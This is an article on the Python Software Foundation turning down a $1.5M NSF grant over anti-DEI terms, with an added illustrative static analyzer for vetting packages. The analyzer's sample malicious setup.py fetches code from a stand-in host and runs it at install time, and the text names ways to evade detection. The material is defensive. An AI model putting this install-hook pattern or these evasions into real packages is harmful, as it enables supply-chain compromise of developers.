Python Foundation’s $1.5M Stand Against Anti-DEI Rules

According to Ars Technica, the Python Software Foundation has rejected a $1.5 million National Science Foundation grant due to anti-DEI requirements imposed by the Trump administration. The grant would have been the largest in the organization’s history and was intended to fund security improvements for Python and PyPI through automated proactive review tools. After a months-long vetting process where only 36% of new NSF applicants typically succeed, the foundation was presented with terms requiring them to affirm they “do not, and will not during the term of this financial assistance award, operate any programs that advance or promote DEI.” The foundation’s board voted unanimously to withdraw the application, citing conflict with their mission to support “a diverse and international community of Python programmers.” This decision follows a similar withdrawal by The Carpentries in June over identical concerns.

The Unseen Cost of Standing by Principles

This decision is a significant financial sacrifice for an organization with an annual budget of about $5 million and only 14 staff members. The rejected $1.5 million grant amounts to roughly 30% of that annual operating budget, money that could have dramatically accelerated the foundation's security initiatives. What makes this particularly notable is that the Python Software Foundation's mission explicitly includes supporting diversity, which made the grant's terms fundamentally incompatible with its core values. This is not just about turning down money; it is about protecting an organizational identity that has been cultivated over decades.

The Real Cybersecurity Consequences

The security work that the grant would have funded is a meaningful step forward for open source supply-chain protection. Today, review of packages published to PyPI is largely reactive: a malicious package is typically discovered only after it has been uploaded and, often, after users have already installed it. The proposed automated proactive review system would have analyzed packages before they reached users, using capability analysis against known malware datasets, that is, examining what a package's code is able to do (open network connections, spawn processes, decode and execute embedded payloads) and comparing those behaviours with the patterns seen in previously identified malware. The PSF also expected the approach to transfer to other major package registries such as NPM and Crates.io, giving a security uplift across several programming ecosystems. Delaying these protections leaves millions of developers exposed to supply-chain attacks that are growing steadily more sophisticated.
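To make the idea of capability analysis concrete, here is a small static analyzer of the kind a proactive review pipeline would build on. It is an added illustration, not the PSF's or PyPI's tooling and not the system the grant would have funded; the capability taxonomy, the "suspicious combination" rules, and the two sample source files are all constructed for this example.

```python
"""Toy capability analysis of a Python source file (added example).

Parses the file with the standard-library ast module, records which
capabilities its imports and calls exercise, and holds the package for
human review when a combination typical of malicious install hooks
(e.g. download-then-exec) appears. Taxonomy and rules are assumptions.
"""
import ast
from typing import Dict, FrozenSet, List, Set

# Imports that grant a capability on their own (assumed taxonomy).
IMPORT_CAPABILITIES: Dict[str, str] = {
    "socket": "network", "urllib": "network", "urllib.request": "network",
    "http.client": "network", "requests": "network", "ftplib": "network",
    "subprocess": "process", "ctypes": "native",
    "base64": "encoding", "marshal": "encoding", "zlib": "encoding",
}

# Dotted call targets that imply a capability (assumed taxonomy).
CALL_CAPABILITIES: Dict[str, str] = {
    "eval": "dynamic_code", "exec": "dynamic_code", "compile": "dynamic_code",
    "__import__": "dynamic_code", "importlib.import_module": "dynamic_code",
    "os.system": "process", "os.popen": "process",
    "subprocess.run": "process", "subprocess.Popen": "process",
    "subprocess.check_output": "process",
    "os.getenv": "env_read", "os.environ.get": "env_read",
    "urllib.request.urlopen": "network", "requests.get": "network",
    "socket.socket": "network", "base64.b64decode": "encoding",
}

# Combinations that warrant holding the package (assumed rule set):
# fetching bytes and then executing or spawning them is the classic
# malicious setup.py pattern.
SUSPICIOUS_COMBINATIONS: List[FrozenSet[str]] = [
    frozenset({"network", "dynamic_code"}),
    frozenset({"network", "process"}),
    frozenset({"encoding", "dynamic_code"}),
]


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from a Name/Attribute chain; '' if not that shape."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def extract_capabilities(source: str) -> Set[str]:
    """Return the capabilities exercised by a module's imports and calls."""
    caps: Set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                for name in (alias.name, alias.name.split(".")[0]):
                    if name in IMPORT_CAPABILITIES:
                        caps.add(IMPORT_CAPABILITIES[name])
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                full = f"{node.module}.{alias.name}"
                for table in (IMPORT_CAPABILITIES, CALL_CAPABILITIES):
                    for name in (full, node.module, node.module.split(".")[0]):
                        if name in table:
                            caps.add(table[name])
        elif isinstance(node, ast.Call):
            target = _dotted_name(node.func)
            if target in CALL_CAPABILITIES:
                caps.add(CALL_CAPABILITIES[target])
    return caps


def review(source: str) -> dict:
    """Decide 'allow' or 'hold' for one source file before publication."""
    try:
        caps = extract_capabilities(source)
    except SyntaxError:
        # A file the parser cannot read cannot be vouched for: hold it.
        return {"capabilities": [], "matched": [], "verdict": "hold"}
    matched = [sorted(c) for c in SUSPICIOUS_COMBINATIONS if c <= caps]
    return {"capabilities": sorted(caps), "matched": matched,
            "verdict": "hold" if matched else "allow"}


# Constructed sample inputs (not real packages).
BENIGN_MODULE = '''
import json
import requests

def fetch(url):
    return json.loads(requests.get(url, timeout=5).text)
'''

MALICIOUS_SETUP = '''
import base64, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = urllib.request.urlopen("http://example.invalid/p").read()
        exec(base64.b64decode(payload))

setup(name="totally-fine", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MODULE), ("setup.py", MALICIOUS_SETUP)):
        print(label, review(src))
```

The benign module is allowed because network access alone is normal for a library; the constructed setup.py is held because it combines network access, base64 decoding and `exec`, which is exactly the install-time download-and-run shape the text is concerned with. A purely syntactic check like this is easy to evade (building call names from strings, `getattr(__builtins__, "ex" + "ec")`, obfuscated bytecode), which is why a production reviewer pairs capability extraction with datasets of known malicious packages and with behavioural signals rather than relying on any one of them.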

Broader Political Landscape

The NSF’s new requirements that took effect in May represent a significant shift in how government funding interacts with diversity initiatives. The restriction applies not just to activities directly funded by the grant but to “any and all activity of the PSF as a whole,” creating an all-or-nothing scenario. This broad application means organizations must choose between accepting funding and maintaining their existing diversity programs, even those funded through other sources. The National Science Foundation, traditionally focused on scientific advancement, now finds itself enforcing political requirements that conflict with many technology communities’ established practices.

Setting a Dangerous Precedent

The Python Foundation's decision, taken together with The Carpentries' withdrawal in June, points to a pattern that could affect many open source and educational organizations. Such precedents create a chilling effect in which other foundations may quietly scale back their diversity initiatives in order to qualify for government funding. The provision that a violation could trigger a "claw back" of funds already transferred adds enormous financial risk, effectively tying an entire organization's finances to political compliance. This could fundamentally alter how open source foundations operate, potentially pushing them toward corporate sponsorship models that come with their own restrictions and expectations.

What This Means for Open Source Sustainability

The Python Foundation’s call for alternative funding from companies and individuals who use Python highlights a broader challenge in open source sustainability. While open source foundations have traditionally supplemented corporate sponsorship with government grants, this incident suggests that funding sources are becoming increasingly politicized. The technology industry may need to step up more significantly to fund critical infrastructure projects, but corporate funding often comes with strings attached regarding intellectual property or development priorities. This creates a difficult balancing act for foundations trying to maintain their independence while securing necessary resources for community projects.

The Ripple Effect Across Technology

Python's position as one of the world's most popular programming languages means this decision reaches far beyond the foundation itself. With Python fundamental to fields from data science to web development to artificial intelligence, security weaknesses in its packaging ecosystem have widespread consequences. The foundation's stance may prompt other technology organizations to reevaluate their funding sources and diversity commitments. Smaller organizations with less financial cushion, however, may feel pressured to accept restrictive terms, potentially undermining diversity efforts across the technology sector at a time when representation remains a significant challenge.
